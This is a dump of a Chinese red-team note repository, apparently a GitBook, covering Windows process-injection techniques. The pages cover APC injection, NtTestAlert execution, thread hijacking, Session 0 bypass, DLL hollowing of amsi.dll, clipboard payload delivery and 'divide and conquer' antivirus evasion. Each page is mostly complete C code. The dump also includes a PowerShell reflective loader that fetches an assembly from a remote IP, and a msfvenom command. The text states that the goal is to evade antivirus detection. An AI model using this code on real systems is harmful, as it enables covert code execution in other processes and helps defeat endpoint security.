58 | $bins  = [System.Convert]::FromBase64String($base64);
59 | $invoke = [System.Reflection.Assembly]::Load($bins);
60 | [System.Console]::WriteLine($invoke);
61 | 
62 | $args = New-Object -TypeName System.Collections.ArrayList
63 | 
64 | [string[]]$strings = "-group=all","-full"
65 | 
66 | $args.Add($strings)
67 | 
68 | $invoke.EntryPoint.Invoke($N,$args.ToArray());
69 | ```
70 | 
71 | 也可以远程加载
72 | 
73 | ```text
74 | $invoke = [System.Reflection.Assembly]::UnsafeLoadFrom("http://192.168.0.125/base");
75 | ```
76 | 
77 | ### 实现效果
78 | 
79 | ![](../.gitbook/assets/image%20%28218%29.png)
80 | 
81 | ![](../.gitbook/assets/image%20%28217%29.png)
82 | 
83 | 


--------------------------------------------------------------------------------
/code-and-dll-process-injection/apc-and-nttestalert-code-execute.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | description: APC & NtTestAlert代码执行
 3 | ---
 4 | 
 5 | # APC & NtTestAlert Code Execute
 6 | 
 7 | ## APC & NtTestAlert Code Execute简介
 8 | 
 9 | 在Early Bird篇章介绍过,本质上是线程初始化时调用的为导出函数NtTestAlert函数清空APC队列导致的代码执行,那我们是不是可以直接调用这个函数进行代码执行呢？
10 | 
11 | 这种技术并不依赖CreateThread和CreateRemoteThread等被杀软严格监控的API就能进行代码执行,也并没有直接操作恶意代码,而是触发操作系统\(其实也是本进程\)去帮我们执行这些恶意代码,这样也一定程度上逃避了检测。
12 | 
13 | ## 执行流程
14 | 
15 | 1. 修改shellcode执行权限
16 | 2. 获取NtTestAlert函数地址
17 | 3. 插入APC队列
18 | 4. 调用NtTestAlert
19 | 
20 | ## 代码实现
21 | 
22 | ```text
23 | #include <Windows.h>
24 | #include<stdio.h>
25 | char shellcode[]="";
26 | typedef VOID(NTAPI* pNtTestAlert)(VOID);
27 | int main() {
28 | 
29 | 	pNtTestAlert NtTestAlert = (pNtTestAlert)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtTestAlert");
30 | 
31 | 	LPVOID lpBaseAddress = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
32 | 
33 | 	memcpy(lpBaseAddress, shellcode, sizeof(shellcode));
34 | 
35 | 	QueueUserAPC((PAPCFUNC)lpBaseAddress, GetCurrentThread(), NULL);
36 | 	
37 | 	NtTestAlert();
38 | 	return 0;
39 | }
40 | ```
41 | 
42 | ## LINKS
43 | 
44 | {% embed url="https://undocumented.ntinternals.net/" %}
45 | 
46 | 
47 | 
48 | 


--------------------------------------------------------------------------------
/code-and-dll-process-injection/apc-injection.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | description: APC注入
  3 | ---
  4 | 
  5 | # APC Injection
  6 | 
  7 | ## APC简介
  8 | 
  9 | > 一个_异步过程调用_（APC）的是，在一个特定的线程的上下文中以异步方式执行的功能。当APC排队到线程中时，系统会发出软件中断。下次调度线程时，它将运行APC功能。系统生成的APC称为_内核模式APC_。由应用程序生成的APC称为_用户模式APC_。线程必须处于可警报状态才能运行用户模式APC。
 10 | 
 11 | > 每个线程都有自己的APC队列。应用程序通过调用**QueueUserAPC**函数将APC排队到线程中。调用线程在对**QueueUserAPC**的调用中指定APC函数的地址。APC的排队是对线程调用APC函数的请求。
 12 | 
 13 | > 当用户模式APC排队时，除非它处于警报状态，否则不会将其排队的线程定向到调用APC函数。当线程调用**SleepEx**，**SignalObjectAndWait**，**MsgWaitForMultipleObjectsEx**，**WaitForMultipleObjectsEx**或**WaitForSingleObjectEx**函数时，它将进入可警告状态。如果在APC排队之前满足了等待，线程将不再处于可警告的等待状态，因此将不执行APC功能。但是，APC仍在排队，因此当线程调用另一个可警告的等待函数时，将执行APC函数。**ReadFileEx**，**SetWaitableTimer**，**SetWaitableTimerEx**，和**WriteFileEx**功能使用APC作为完成通知回调机制来实现。
 14 | 
 15 | 简单的说，由于在线程执行过程中，其他线程无法干预当前执行线程\(占用cpu\)，如果需要干预当前执行线程的操作，就需要有一种让线程自身去调用的机制，windows实现了一种称之为APC的技术，这种技术可以通过插入队列\(执行信息\)让线程在一定条件下自己去调用，这样就实现了异步操作。
 16 | 
 17 | > 线程是不能被“杀掉”、“挂起”、“恢复”的,线程在执行的时候自己占据着CPU,别人怎么可能控制它呢?
 18 | 
 19 | > 举个极端的例子:如果不调用API,屏蔽中断,并保证代码不出现异常,线程将永久占用CPU,何谈控制呢?所以说线程如果想“死",一定是自己执行代码把自己杀死,不存在“他杀”这种情况!
 20 | 
 21 | > 那如果想改变一个线程的行为该怎么办呢?
 22 | 
 23 | > 可以给他提供一个函数,让它自己去调用,这个函数就是APC \(Asyncroneus Procedure Call\),即异步过程调用。
 24 | 
 25 | ## 注入流程
 26 | 
 27 | 1. 从进程名确定PID
 28 | 2. 从PID确定TID
 29 | 3. 写入必要代码
 30 | 4. 插入APC队列
 31 | 
 32 | ## 代码实现
 33 | 
 34 | ```text
 35 | #include<Windows.h>
 36 | #include<stdio.h>
 37 | #include <Tlhelp32.h>
 38 | 
 39 | DWORD GetProcessIdByName(LPCTSTR lpszProcessName)
 40 | {
 41 | 	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 42 | 	if (hSnapshot == INVALID_HANDLE_VALUE)
 43 | 	{
 44 | 		return 0;
 45 | 	}
 46 | 
 47 | 	PROCESSENTRY32 pe;
 48 | 	pe.dwSize = sizeof pe;
 49 | 
 50 | 	if (Process32First(hSnapshot, &pe))
 51 | 	{
 52 | 		do {
 53 | 			if (lstrcmpi(lpszProcessName, pe.szExeFile) == 0)
 54 | 			{
 55 | 				CloseHandle(hSnapshot);
 56 | 				return pe.th32ProcessID;
 57 | 			}
 58 | 		} while (Process32Next(hSnapshot, &pe));
 59 | 	}
 60 | 
 61 | 	CloseHandle(hSnapshot);
 62 | 	return 0;
 63 | }
 64 | 
 65 | 
 66 | BOOL GetAllThreadIdByProcessId(DWORD dwProcessId)
 67 | {
 68 | 
 69 | 	DWORD dwBufferLength = 1000;
 70 | 	THREADENTRY32 te32 = { 0 };
 71 | 	HANDLE hSnapshot = NULL;
 72 | 	BOOL bRet = TRUE;
 73 | 
 74 | 
 75 | 	// 获取线程快照
 76 | 	::RtlZeroMemory(&te32, sizeof(te32));
 77 | 	te32.dwSize = sizeof(te32);
 78 | 	hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
 79 | 
 80 | 	// 获取第一条线程快照信息
 81 | 	bRet = ::Thread32First(hSnapshot, &te32);
 82 | 	while (bRet)
 83 | 	{
 84 | 		// 获取进程对应的线程ID
 85 | 		if (te32.th32OwnerProcessID == dwProcessId)
 86 | 		{
 87 | 			return te32.th32ThreadID;
 88 | 		}
 89 | 
 90 | 		// 遍历下一个线程快照信息
 91 | 		bRet = ::Thread32Next(hSnapshot, &te32);
 92 | 	}
 93 | 	return 0;
 94 | }
 95 | 
 96 | int main() {
 97 | 	FARPROC pLoadLibrary = NULL;
 98 | 	HANDLE hThread = NULL;
 99 | 	HANDLE hProcess = 0;
100 | 	DWORD Threadid = 0;
101 | 	DWORD ProcessId = 0;
102 | 	BYTE DllName[] = "C:\\Users\\Black Sheep\\source\\repos\\ApcInject\\x64\\Debug\\TestDll.dll";
103 | 	LPVOID AllocAddr = NULL;
104 | 
105 | 	ProcessId = GetProcessIdByName(L"explorer.exe");
106 | 	hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, ProcessId);
107 | 	pLoadLibrary = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");
108 | 	AllocAddr = VirtualAllocEx(hProcess, 0, sizeof(DllName) + 1, MEM_COMMIT, PAGE_READWRITE);
109 | 	WriteProcessMemory(hProcess, AllocAddr, DllName, sizeof(DllName) + 1, 0);
110 | 	Threadid = GetAllThreadIdByProcessId(ProcessId);
111 | 	hThread = OpenThread(THREAD_ALL_ACCESS, 0, Threadid);
112 | 	QueueUserAPC((PAPCFUNC)pLoadLibrary, hThread, (ULONG_PTR)AllocAddr);
113 | 	CloseHandle(hProcess);
114 | 	CloseHandle(hThread);
115 | 	return 0;
116 | 
117 | }
118 | ```
119 | 
120 | ## LINKS
121 | 
122 | {% embed url="https://github.com/idiotc4t/ApcInject" %}
123 | 
124 | {% embed url="https://docs.microsoft.com/en-us/windows/win32/sync/asynchronous-procedure-calls" %}
125 | 
126 | 
127 | 
128 | 


--------------------------------------------------------------------------------
/code-and-dll-process-injection/apc-thread-hijack.md:
--------------------------------------------------------------------------------
 1 | # APC Thread Hijack
 2 | 
 3 | ## 简介
 4 | 
 5 | 我也不知道为什么要写这个....这玩意有点像脱裤子放屁....
 6 | 
 7 | 昨天和某个dalao谈论了一下apc注入，我们经过友好的技术♂交流\(迫真\)，意识到了三环插入的apc无法确定时间执行，于是有了这个东西。
 8 | 
 9 | 能弹出窗来就是了。
10 | 
11 | ## 流程
12 | 
13 | 1. 插入apc
14 | 2. 挂起线程
15 | 3. 修改rip指向NtTestAlert函数
16 | 4. 恢复线程
17 | 
18 | ## 代码
19 | 
20 | ```text
21 | #include<Windows.h>
22 | #include<stdio.h>
23 | 
24 | char shellcode[] =
25 | "";
26 | 
27 | typedef VOID(NTAPI* pNtTestAlert)(VOID);
28 | 
29 | int main() {
30 | 	STARTUPINFOA si = { 0 };
31 | 	si.cb = sizeof(si);
32 | 	PROCESS_INFORMATION pi = { 0 };
33 | 	pNtTestAlert NtTestAlert = (pNtTestAlert)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtTestAlert");
34 | 	CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
35 | 	Sleep(1000);//Wait for thread initialization to complete -> nttestalert is executed
36 | 	SuspendThread(pi.hThread);
37 | 	LPVOID lpBuffer = VirtualAllocEx(pi.hProcess, NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
38 | 	WriteProcessMemory(pi.hProcess, lpBuffer, shellcode, sizeof(shellcode), NULL);
39 | 	CONTEXT ctx = { 0 };
40 | 	QueueUserAPC((PAPCFUNC)lpBuffer, pi.hThread, NULL);
41 | 	ctx.ContextFlags = CONTEXT_ALL;
42 | 	GetThreadContext(pi.hThread, &ctx);
43 | 	ctx.Rip = (DWORD64)NtTestAlert;
44 | 	SetThreadContext(pi.hThread, &ctx);
45 | 	ResumeThread(pi.hThread);
46 | 	CloseHandle(pi.hProcess);
47 | 	CloseHandle(pi.hThread);
48 | 	//NtTestAlert();
49 | 	return 0;
50 | }
51 | ```
52 | 
53 | ![](../.gitbook/assets/image%20%28144%29.png)
54 | 
55 | 


--------------------------------------------------------------------------------
/code-and-dll-process-injection/bypass-session-0-injection.md:
--------------------------------------------------------------------------------
  1 | # Bypass Session 0 Injection
  2 | 
  3 | ## 简介
  4 | 
  5 | 在使用传统的进程注入技术的过程中，可以向普通用户用户进程注入shellcode或dll，那么如果我们想更进一步注入到系统进程内，通常会失败，这是由于session 0隔离的缘故，接下来本文会介绍如何突破session 0隔离进行对系统进程的注入。
  6 | 
  7 | ## ZwCreateThreadEx函数
  8 | 
  9 | 通过调用CreateRemoteThread创建远程线程在NT内核6.0以前是没有什么问题，但在6.0以后引入了session隔离机制，在创建一个线程时先挂起，然后判断是否运行在所在会话层再决定是否恢复运行。
 10 | 
 11 | ZwCreateThreadEx函数比CreateRemoteThread函数更接近内核，CreateRemoteThread最终也是调用ZwCreateThreadEx函数来创建线程的，通过前人的研究发现，通过对CreateRemoteThread逆向研究发现，在内部调用ZwCreateThreadEx会把第七个参数创建标识设置为1，这样会使创建的线程挂起，这也是注入失败的原因。
 12 | 
 13 | 所以如果想要创建的线程成功执行我们需要将第七个参数指定为0，这样我们就能在创建线程后让他执行。
 14 | 
 15 | ZwCreateThreadEx函数原型不同位数莫得区别。
 16 | 
 17 | ![](../.gitbook/assets/image%20%2823%29.png)
 18 | 
 19 | ## 代码实现
 20 | 
 21 | 该注入技术与经典WriteProcessMemory，CreateRemoteThread注入技术非常相似，只是把创建进程的函数从CreateRemoteThread换成了ZwCreateThreadEx。
 22 | 
 23 | ```text
 24 | #include <Windows.h>
 25 | #include <stdio.h>
 26 | 
 27 | #ifdef _WIN64
 28 | typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
 29 | 	PHANDLE ThreadHandle,
 30 | 	ACCESS_MASK DesiredAccess,
 31 | 	LPVOID ObjectAttributes,
 32 | 	HANDLE ProcessHandle,
 33 | 	LPTHREAD_START_ROUTINE lpStartAddress,
 34 | 	LPVOID lpParameter,
 35 | 	ULONG CreateThreadFlags,
 36 | 	SIZE_T ZeroBits,
 37 | 	SIZE_T StackSize,
 38 | 	SIZE_T MaximumStackSize,
 39 | 	LPVOID pUnkown);
 40 | #else
 41 | typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
 42 | 	PHANDLE ThreadHandle,
 43 | 	ACCESS_MASK DesiredAccess,
 44 | 	LPVOID ObjectAttributes,
 45 | 	HANDLE ProcessHandle,
 46 | 	LPTHREAD_START_ROUTINE lpStartAddress,
 47 | 	LPVOID lpParameter,
 48 | 	BOOL CreateSuspended,
 49 | 	DWORD dwStackSize,
 50 | 	DWORD dw1,
 51 | 	DWORD dw2,
 52 | 	LPVOID pUnkown);
 53 | #endif
 54 | 
 55 | typedef DWORD(WINAPI* typedef_LoadLibraryA)(char* path);
 56 | /*
 57 | BOOL EnbalePrivileges(HANDLE hProcess, char* pszPrivilegesName)
 58 | {
 59 | 	HANDLE hToken = NULL;
 60 | 	LUID luidValue = { 0 };
 61 | 	TOKEN_PRIVILEGES tokenPrivileges = { 0 };
 62 | 	BOOL bRet = FALSE;
 63 | 
 64 | 	bRet = OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES, &hToken);
 65 | 
 66 | 	bRet = LookupPrivilegeValue(NULL, pszPrivilegesName, &luidValue);
 67 | 
 68 | 	tokenPrivileges.PrivilegeCount = 1;
 69 | 	tokenPrivileges.Privileges[0].Luid = luidValue;
 70 | 	tokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
 71 | 	bRet = AdjustTokenPrivileges(hToken, FALSE, &tokenPrivileges, 0, NULL, NULL);
 72 | 
 73 | 
 74 | 	return TRUE;
 75 | }*/
 76 | 
 77 | int main(int argc, char* argv[]) {
 78 | 	//EnbalePrivileges(GetCurrentProcess(), SE_DEBUG_NAME);
 79 | 
 80 | 	char DllPath[] = "C:\\Users\\Black Sheep\\source\\repos\\sesion0\\x64\\Debug\\TestDll.dll";
 81 | 
 82 | 	HANDLE hRemoteThread;
 83 | 
 84 | 	HANDLE hNtModule = GetModuleHandleA("ntdll.dll");
 85 | 
 86 | 	HANDLE hKeModule = GetModuleHandleA("Kernel32.dll");
 87 | 
 88 | 	typedef_ZwCreateThreadEx ZwCreateThreadEx = GetProcAddress(hNtModule, "ZwCreateThreadEx");
 89 | 
 90 | 	typedef_LoadLibraryA myLoadLibraryA = GetProcAddress(hKeModule, "LoadLibraryA");
 91 | 
 92 | 	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 1516);
 93 | 
 94 | 	LPVOID lpBaseAddress = VirtualAllocEx(hProcess, NULL, sizeof(DllPath)+1, MEM_COMMIT, PAGE_READWRITE);
 95 | 
 96 | 	WriteProcessMemory(hProcess, lpBaseAddress, DllPath, sizeof(DllPath), 0);
 97 | 
 98 | 	ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)myLoadLibraryA, lpBaseAddress, 0, 0, 0, 0, NULL);
 99 | 
100 | 	CloseHandle(hRemoteThread);
101 | 	CloseHandle(hProcess);
102 | 	FreeLibrary(hKeModule);
103 | 	FreeLibrary(hNtModule);
104 | 	return 0;
105 | 
106 | }
107 | ```
108 | 
109 | ![](../.gitbook/assets/image%20%283%29.png)
110 | 
111 | * github:[https://github.com/idiotc4t/sesion0](https://github.com/idiotc4t/sesion0)
112 | 
113 | ## LINKS
114 | 
115 | 《windows黑客编程》
116 | 
117 | {% embed url="https://kb.firedaemon.com/support/solutions/articles/4000086228-what-is-session-0-isolation-what-do-i-need-to-know-about-it-" %}
118 | 
119 | 
120 | 
121 | 


--------------------------------------------------------------------------------
/code-and-dll-process-injection/clipboard-data-deliver.md:
--------------------------------------------------------------------------------
 1 | # Clipboard Data Deliver
 2 | 
 3 | ## 简介
 4 | 
 5 | 我这水文居然还有人催更，就随便写点什么吧。
 6 | 
 7 | 前几天同事叫我写个小demo，这里简单记录下，说需要监控剪贴板数据，实质也是一块共享内存，以往用剪贴板作为跨进程通信的方式传递过payload，常见的通信方式也就那么几种ReadFile/WriteFile,CreateMailslot,CreatePipe,socket,OpenClipboard,CreateFileMapping。
 8 | 
 9 | ## 流程
10 | 
11 | 1. OpenClipboard打开剪贴板
12 | 2. GetClipboardData指定格式检索获取对象
13 | 3. GlobalLock锁定内存对象获取指针
14 | 4. 读取数据
15 | 5. GlobalUnlock解锁全局对象
16 | 6. CloseClipboard关闭剪贴板
17 | 
18 | ## 代码
19 | 
20 | ### 监听
21 | 
22 | ```text
23 |     HGLOBAL   hglb;
24 |     LPVOID    lptstr;
25 |     SYSTEMTIME systemTime;
26 |     if (!OpenClipboard(NULL)) { return; };
27 |     hglb = GetClipboardData(CF_TEXT);
28 |     if (hglb != NULL)
29 |     {
30 |         lptstr = GlobalLock(hglb);
31 |         if (lptstr != NULL)
32 |         {
33 |             GetLocalTime(&systemTime);
34 |             printf("%d.%d.%d %d:%d:%d\n", systemTime.wYear, systemTime.wMonth, systemTime.wDay, systemTime.wHour, systemTime.wMinute, systemTime.wSecond);
35 |             printf("%s\n", lptstr);
36 |             fflush(stdout);
37 |             GlobalUnlock(hglb);
38 |         }
39 |     }
40 |     CloseClipboard();
41 | ```
42 | 
43 | ### 传递
44 | 
45 | ```text
46 | 
47 |     if (!OpenClipboard(NULL)) { return; };
48 |     hGlobalCopy = GlobalAlloc(GMEM_MOVEABLE,sizeof(shellcode));
49 | 
50 |     lpCopy = GlobalLock(hGlobalCopy);
51 |     memcpy(lpCopy, payload->payload, payload->length);
52 |     GlobalUnlock(hGlobalCopy);
53 | 
54 |     SetClipboardData(CF_TEXT, hGlobalCopy);
55 | 
56 |     hGlobal = GetClipboardData(CF_TEXT);
57 |     if (hGlobal != NULL)
58 |     {
59 |         lptstr = GlobalLock(hGlobal);
60 |         if (lptstr != NULL)
61 |         {
62 |             memcpy(buffer, lptstr, payload->length);
63 |             GlobalUnlock(hGlobal);
64 |         }
65 |     }
66 |     EmptyClipboard();
67 |     CloseClipboard();
68 |     spawn(buffer, payload->length, payload->key);
69 |     free(buffer);
70 |     
71 | ```
72 | 
73 | ## LINKS
74 | 
75 | {% embed url="https://docs.microsoft.com/zh-cn/windows/win32/dataxchg/clipboard?redirectedfrom=MSDN" %}
76 | 
77 | 
78 | 
79 | 


--------------------------------------------------------------------------------
/code-and-dll-process-injection/divide-and-conquer.md:
--------------------------------------------------------------------------------
 1 | # Divide and Conquer
 2 | 
 3 | ##  简介
 4 | 
 5 | 看到了一种比较有意思的手法，现在的杀软会关注函数的执行链， [theevilbit](https://gist.github.com/theevilbit)公开了一种通过不同进程分离执行API，绕过基于行为的AV检测。
 6 | 
 7 | 常见的行为检测会有监控堆栈的调用链和hookapi记录行为，这种分离执行方式都能绕过。
 8 | 
 9 | ## 流程
10 | 
11 | 1. 创建傀儡进程
12 | 2. 向傀儡进程写入payload
13 | 3. 创建同文件进程传入pid
14 | 4. 通过pid打开傀儡句柄
15 | 5. 创建远程线程
16 | 
17 | ## 代码
18 | 
19 | ```text
20 | 
21 | 
22 | #include <stdio.h>
23 | #include <windows.h>
24 | unsigned char shellcode[] =
25 | "\xfc78\x00";
26 | 
27 | int main(int argc, char* argv[]) {
28 | 
29 |     if (argv[1]==NULL)
30 |     {
31 |         STARTUPINFOA si = { 0 };
32 |         si.cb = sizeof(si);
33 |         PROCESS_INFORMATION pi = { 0 };
34 | 
35 |         CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
36 |         VirtualAllocEx(pi.hProcess, (PVOID)0x0000480000000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
37 |         WriteProcessMemory(pi.hProcess, (PVOID)0x0000480000000000, shellcode, sizeof(shellcode), NULL);
38 | 
39 |         char cmd[MAX_PATH] = {0};
40 |         wsprintfA(cmd, "%s %d", argv[0], pi.dwProcessId);
41 | 
42 |         CreateProcessA(NULL, (LPSTR)cmd, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
43 |     }
44 |     else
45 |     {
46 |         HANDLE hProcess =  OpenProcess(PROCESS_ALL_ACCESS, NULL, atoi(argv[1]));
47 |         CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)0x0000480000000000, 0, 0, 0);
48 |     }
49 |     
50 |     
51 |     return 0;
52 | }
53 | 
54 | ```
55 | 
56 | ![](../.gitbook/assets/image%20%28242%29.png)
57 | 
58 | ## 同理
59 | 
60 | ```text
61 |     if (argv[1]==NULL)
62 |     {
63 |         STARTUPINFOA si = { 0 };
64 |         si.cb = sizeof(si);
65 |         PROCESS_INFORMATION pi = { 0 };
66 | 
67 |         CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
68 |         VirtualAllocEx(pi.hProcess, (PVOID)0x0000480000000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
69 |         WriteProcessMemory(pi.hProcess, (PVOID)0x0000480000000000, shellcode, sizeof(shellcode), NULL);
70 |         char cmd[MAX_PATH] = {0};
71 |         wsprintfA(cmd, "%s %d", argv[0], pi.dwThreadId);
72 |         QueueUserAPC((PAPCFUNC)0x0000480000000000, pi.hThread, NULL);
73 |         CreateProcessA(NULL, (LPSTR)cmd, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
74 |     }
75 |     else
76 |     {
77 |         HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, NULL, atoi(argv[1]));
78 |         ResumeThread(hThread);
79 |     }
80 |     
81 | ```
82 | 
83 | ![](../.gitbook/assets/image%20%28241%29.png)
84 | 
85 | ## LINK
86 | 
87 | {% embed url="https://gist.github.com/theevilbit/073ca4eb15383eb3254272fc24632efd" %}
88 | 
89 | 
90 | 
91 | 


--------------------------------------------------------------------------------
/code-and-dll-process-injection/dll-hollowing.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | description: DLL Hollowing
  3 | ---
  4 | 
  5 | # DLL Hollowing
  6 | 
  7 | ## 简介
  8 | 
  9 | 模块镂空\(dll hollowing\)也是一种shellcode注入技术，原理和思路与process hollowing类似，通过合法的模块信息来伪装恶意代码，虽然我们可以用远程dll注入来完整注入整个恶意dll，但此类注入往往比较容易检测，我们需要往受害者主机上传入一个恶意dll，这样杀毒软件可以通过监控入windows/temp/等目录实现对远程dll注入的拦截，而模块镂空就不会存在这样的风险，因为我们镂空的往往是一个带有微软签名的dll，为了防止进程出错，我们并不能直接镂空一个进程空间中已存在的dll，需要先对目标进程远程注入一个系统合法dll，然后再镂空它，这样我们就获得了一个和windows模块相关联的shellcode环境。
 10 | 
 11 | ## 实现思路
 12 | 
 13 | 1. 远程注入一个系统dll\(原理参考[CreateRemoteThrea](createremotethread.md)的dll注入\)
 14 | 2. 获取该模块在目标进程中的虚拟地址
 15 | 3. 定位模块的入口点
 16 | 4. 使用shellcode复写入口点
 17 | 5. 创建远程线程
 18 | 
 19 | ## 代码实现
 20 | 
 21 | 代码参考@mantvydasb
 22 | 
 23 | ```text
 24 | #include <iostream>
 25 | #include <Windows.h>
 26 | #include <psapi.h>
 27 | 
 28 | char shellcode[] = "";
 29 | 
 30 | int main(int argc, char* argv[])
 31 | {
 32 | 	
 33 | 	
 34 | 	TCHAR ModuleName[] = L"C:\\windows\\system32\\amsi.dll";
 35 | 	HMODULE hModules[256] = {};
 36 | 	SIZE_T hModulesSize = sizeof(hModules);
 37 | 	DWORD hModulesSizeNeeded = 0;
 38 | 	DWORD moduleNameSize = 0;
 39 | 	SIZE_T hModulesCount = 0;
 40 | 	CHAR rModuleName[128] = {};
 41 | 	HMODULE rModule = NULL;
 42 | 
 43 | 	// inject a benign DLL into remote process
 44 | 	//hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
 45 | 	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 2924);
 46 | 
 47 | 	LPVOID lprBuffer = VirtualAllocEx(hProcess, NULL, sizeof ModuleName, MEM_COMMIT, PAGE_READWRITE);
 48 | 	WriteProcessMemory(hProcess, lprBuffer, (LPVOID)ModuleName, sizeof ModuleName, NULL);
 49 | 	PTHREAD_START_ROUTINE threadRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
 50 | 	HANDLE dllThread = CreateRemoteThread(hProcess, NULL, 0, threadRoutine, lprBuffer, 0, NULL);
 51 | 	WaitForSingleObject(dllThread, 1000);
 52 | 
 53 | 	// find base address of the injected benign DLL in remote process
 54 | 	EnumProcessModules(hProcess, hModules, hModulesSize, &hModulesSizeNeeded);
 55 | 	hModulesCount = hModulesSizeNeeded / sizeof(HMODULE);
 56 | 	for (size_t i = 0; i < hModulesCount; i++)
 57 | 	{
 58 | 		rModule = hModules[i];
 59 | 		GetModuleBaseNameA(hProcess, rModule, rModuleName, sizeof(rModuleName));
 60 | 		if (std::string(rModuleName).compare("amsi.dll") == 0)
 61 | 		{
 62 | 			break;
 63 | 		}
 64 | 	}
 65 | 
 66 | 	// get DLL's AddressOfEntryPoint
 67 | 	DWORD headerBufferSize = 0x1000;
 68 | 	LPVOID peHeader = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, headerBufferSize);
 69 | 	ReadProcessMemory(hProcess, rModule, peHeader, headerBufferSize, NULL);
 70 | 
 71 | 	PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)peHeader;
 72 | 	PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)peHeader + dosHeader->e_lfanew);
 73 | 	LPVOID dllEntryPoint = (LPVOID)(ntHeader->OptionalHeader.AddressOfEntryPoint + (DWORD_PTR)rModule);
 74 | 
 75 | 	// write shellcode to DLL's AddressofEntryPoint
 76 | 	WriteProcessMemory(hProcess, dllEntryPoint, (LPCVOID)shellcode, sizeof(shellcode), NULL);
 77 | 
 78 | 	// execute shellcode from inside the benign DLL
 79 | 	CreateRemoteThread(hProcess, NULL, 0, (PTHREAD_START_ROUTINE)dllEntryPoint, NULL, 0, NULL);
 80 | 
 81 | 	return 0;
 82 | }
 83 | ```
 84 | 
 85 | ## 实现效果
 86 | 
 87 | ![](../.gitbook/assets/image%20%289%29.png)
 88 | 
 89 | ![](../.gitbook/assets/image%20%2854%29.png)
 90 | 
 91 | ![](../.gitbook/assets/image%20%2872%29.png)
 92 | 
 93 | ![](../.gitbook/assets/image%20%2867%29.png)
 94 | 
 95 | ## LINKS
 96 | 
 97 | {% embed url="https://www.forrest-orr.net/post/malicious-memory-artifacts-part-i-dll-hollowing" %}
 98 | 
 99 | 
100 | 
101 | {% embed url="https://ired.team/" %}
102 | 
103 | 
104 | 
105 | 


--------------------------------------------------------------------------------
/code-and-dll-process-injection/early-bird-and--createremotethread.md:
--------------------------------------------------------------------------------
 1 | # Early Bird & CreateRemoteThread
 2 | 
 3 | 在前面的[Early Bird](early-bird.md)篇我们知道需要挂起创建一个单独的进程，在恢复挂起线程时程序会调用NtTestAlert函数对APC队列进行处理，试想，我们在已有进程内创建一个挂起的线程，然后往这个线程内插入用户apc，随后恢复进程，是不是同样可以在进程执行入口点前接管进程?
 4 | 
 5 | ![](../.gitbook/assets/image%20%2852%29.png)
 6 | 
 7 | ## 实现思路
 8 | 
 9 | 1. 创建一个挂起的线程
10 | 2. 写入shellcode
11 | 3. 插入apc队列
12 | 4. 恢复线程
13 | 
14 | ## 代码实现
15 | 
16 | 由于进程会在入口点执行前被接管，所以我们其实并不用指向一个真正有效的入口点。
17 | 
18 | 这里有个小坑,生成的shellcode需要指定exitfunc，不然默认的process退出技术会把整个进程结束。
19 | 
20 | ```text
21 | msfvenom -p windows/x64/messagebox exitfunc=thread -f c 
22 | ```
23 | 
24 | * 本进程代码执行:
25 | 
26 | ```text
27 | #include<Windows.h>
28 | #include<stdio.h>
29 | 
30 | char shellcode[] = 
31 | "";
32 | 
33 | int main() {
34 | 
35 | 	HANDLE hThread = NULL;
36 | 	HANDLE hProcess = 0;
37 | 	DWORD ProcessId = 0;
38 | 	LPVOID AllocAddr = NULL;
39 | 
40 | 
41 | 	hProcess = GetCurrentProcess();
42 | 	AllocAddr = VirtualAllocEx(hProcess, 0, sizeof(shellcode) + 1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
43 | 	WriteProcessMemory(hProcess, AllocAddr, shellcode, sizeof(shellcode) + 1, 0);
44 | 
45 | 
46 | 	hThread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)0xfff, 0, CREATE_SUSPENDED, NULL);
47 | 
48 | 	QueueUserAPC((PAPCFUNC)AllocAddr, hThread, 0);
49 | 	ResumeThread(hThread);
50 | 	WaitForSingleObject(hThread,INFINITE);
51 | 	CloseHandle(hProcess);
52 | 	CloseHandle(hThread);
53 | 	return 0;
54 | 
55 | }
56 | ```
57 | 
58 | * 远程线程注入:
59 | 
60 | ```text
61 | #include<Windows.h>
62 | #include<stdio.h>
